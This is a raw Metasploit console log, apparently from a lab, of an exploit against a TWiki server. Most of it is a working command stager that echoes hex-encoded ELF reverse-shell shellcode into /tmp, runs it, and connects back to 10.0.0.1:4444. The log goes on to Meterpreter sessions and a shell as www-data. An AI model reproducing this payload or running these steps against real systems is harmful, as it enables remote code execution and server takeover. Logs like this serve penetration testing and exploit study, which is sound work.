[*] Generated command stager: ["echo -en \\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x01\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x03\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x54\\\\x80\\\\x04\\\\x08\\\\x34\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x34\\\\x00\\\\x20\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x04\\\\x08\\\\x00\\\\x80\\\\x04\\\\x08\\\\xeb\\\\x00\\\\x00\\\\x00\\\\x82\\\\x01\\\\x00\\\\x00\\\\x07\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x6a\\\\x02\\\\x58\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x74\\\\x06\\\\x31\\\\xc0\\\\xb0\\\\x01\\\\xcd\\\\x80\\\\xb0\\\\x42\\\\xcd\\\\x80\\\\x6a\\\\x02\\\\x58\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x75\\\\xed\\\\x6a\\\\x0a\\\\x5e\\\\x31\\\\xdb\\\\xf7\\\\xe3\\\\x53\\\\x43\\\\x53\\\\x6a\\\\x02\\\\xb0\\\\x66\\\\x89\\\\xe1\\\\xcd\\\\x80\\\\x97\\\\x5b\\\\x68\\\\x0a\\\\x00\\\\x00\\\\x01\\\\x68\\\\x02\\\\x00\\\\x11\\\\x5c\\\\x89\\\\xe1\\\\x6a\\\\x66\\\\x58\\\\x50\\\\x51\\\\x57\\\\x89\\\\xe1\\\\x43\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x79\\\\x19\\\\x4e\\\\x74\\\\x3d\\\\x68\\\\xa2\\\\x00\\\\x00\\\\x00\\\\x58\\\\x6a\\\\x00\\\\x6a\\\\x05\\\\x89\\\\xe3\\\\x31\\\\xc9\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x79\\\\xbd\\\\xeb\\\\x27\\\\xb2\\\\x07\\\\xb9\\\\x00\\\\x10\\\\x00\\\\x00\\\\x89\\\\xe3\\\\xc1\\\\xeb\\\\x0c\\\\xc1\\\\xe3\\\\x0c\\\\xb0\\\\x7d\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x78\\\\x10\\\\x5b\\\\x89\\\\xe1\\\\x99\\\\xb2\\\\x66\\\\xb0\\\\x03\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x78\\\\x02\\\\xff\\\\xe1\\\\xb8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xbb\\\\x01\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80>>/tmp/Ebzef ; chmod 777 /tmp/Ebzef ; /tmp/Ebzef ; rm -f /tmp/Ebzef"]
[*] Executing command: echo -en \\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00\\x00\\x54\\x80\\x04\\x08\\x34\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x04\\x08\\x00\\x80\\x04\\x08\\xeb\\x00\\x00\\x00\\x82\\x01\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x6a\\x02\\x58\\xcd\\x80\\x85\\xc0\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\xb0\\x42\\xcd\\x80\\x6a\\x02\\x58\\xcd\\x80\\x85\\xc0\\x75\\xed\\x6a\\x0a\\x5e\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x97\\x5b\\x68\\x0a\\x00\\x00\\x01\\x68\\x02\\x00\\x11\\x5c\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x57\\x89\\xe1\\x43\\xcd\\x80\\x85\\xc0\\x79\\x19\\x4e\\x74\\x3d\\x68\\xa2\\x00\\x00\\x00\\x58\\x6a\\x00\\x6a\\x05\\x89\\xe3\\x31\\xc9\\xcd\\x80\\x85\\xc0\\x79\\xbd\\xeb\\x27\\xb2\\x07\\xb9\\x00\\x10\\x00\\x00\\x89\\xe3\\xc1\\xeb\\x0c\\xc1\\xe3\\x0c\\xb0\\x7d\\xcd\\x80\\x85\\xc0\\x78\\x10\\x5b\\x89\\xe1\\x99\\xb2\\x66\\xb0\\x03\\xcd\\x80\\x85\\xc0\\x78\\x02\\xff\\xe1\\xb8\\x01\\x00\\x00\\x00\\xbb\\x01\\x00\\x00\\x00\\xcd\\x80>>/tmp/Ebzef ; chmod 777 /tmp/Ebzef ; /tmp/Ebzef ; rm -f /tmp/Ebzef
[*] URI: /twiki/bin/view/Main/TWikiUsers?rev=1
[*] Using platform payload (will perform base64 encoding)
[*] Sending payload
[*] Transmitting intermediate stager...(102 bytes)
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Transmitting intermediate stager...(102 bytes)
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Payload sent
[+] Exploit complete
[-] Failed to load client portion of stdapi.
[*] Meterpreter session 2 opened (10.0.0.1:4444 -> 10.0.0.10:35608) at 2026-02-10 09:56:09 +0000
[*] Meterpreter session 3 opened (10.0.0.1:4444 -> 10.0.0.10:35609) at 2026-02-10 09:56:09 +0000
[*] Command Stager progress - 100.00% done (1251/1251 bytes)

meterpreter > shell
Process 4916 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

